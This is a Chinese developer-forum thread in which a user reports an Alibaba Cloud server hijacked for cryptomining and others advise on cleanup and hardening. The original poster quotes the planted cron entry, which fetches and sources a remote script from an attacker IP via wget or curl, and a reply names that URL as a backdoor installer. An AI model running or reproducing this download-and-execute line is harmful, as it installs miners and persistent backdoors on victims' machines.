太可怕了，第一次碰到，阿里云服务器被人侵入用来挖矿了。。。。

logroate 进程在狂刷 cpu , 不知道是什么侵入的（这是最可怕的），太可恶了，可怕。。。。

bigxianyu

2024-06-01 10:18:26 +08:00

然后阿里云告诉我说，你当前账号用的是免费版云安全中心，不支持病毒查杀。。。。

Canglin

2024-06-01 10:25:28 +08:00

不过可以看是哪些进程，kill 掉后删除就好了，我也被弄过

Foxkeh

2024-06-01 10:30:59 +08:00

只能检查下 SSH 和各种暴露到公网的弱密码, 安全组, 不明来源的软件或被爆出漏洞的第三方 Web 应用(尤其是用 root 权限运行的)

然后建议重装

tinyfry

2024-06-01 10:33:38 +08:00

果断重装，不要开放一些不用的端口，密码强度要设置高一些，定期对组件进行升级。

bigxianyu

2024-06-01 10:48:05 +08:00

@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) , 这是 cron 任务里被添加的东西

bigxianyu

2024-06-01 10:48:44 +08:00

@Canglin 嗯，已经手动弄了，搜到了以前也有人被搞过

idragonet

2024-06-01 10:48:59 +08:00

系统重新安装肯定的，SSH 只开启证书登录。

bigxianyu

2024-06-01 11:14:04 +08:00

@bigxianyu 问下大佬们，IP 有举报功能吗，感觉可以有这个功能，

bigxianyu

2024-06-01 11:15:59 +08:00

@bigxianyu 我要举报这个 ip ，找到对应的
@bigxianyu 185.196.8.123 我要举报这个 IP , 感觉有点神奇，好像这个 IP 发生过好久了，我在 google 搜索都搜到了好几篇文章

virusdefender

2024-06-01 11:30:07 +08:00

据我经验，50% 是 ssh 弱口令，30% 是 redis 弱口令，20% 是各种其他漏洞。

Canglin

2024-06-01 13:49:31 +08:00

@bigxianyu #6 你是不是用过那种公共的 docker 镜像啊？我之前弄过一个 Oracle 和 MySql ，就被挖矿了

1423

2024-06-01 14:05:06 +08:00

就是因为你们这种人,国产服务和 APP 才肆无忌惮的以安全保护的名义查用户的数据

Pierro

2024-06-01 15:24:00 +08:00

之前用 docker 远程部署镜像端口有漏洞就被挖矿了各种查定时文件什么的清了还是会自动执行就直接重装了

oneisall8955

2024-06-01 18:02:21 +08:00

http://185.196.8.123/logservice.sh 这个文件做了好几个后门，systemd ，.bashrc ，cron ，都检查下

akira

2024-06-01 22:40:24 +08:00

服务器直接作废重新开一台吧，然后好好做好安全

Gilfoyle26

2024-06-02 02:03:52 +08:00

阿里云这个回复，是真的让人心寒。

JiunnTarn

2024-06-02 05:48:08 +08:00

@Pierro #14 前天刚经历，一模一样😭

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://ex.noerr.eu.org/t/1045890

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.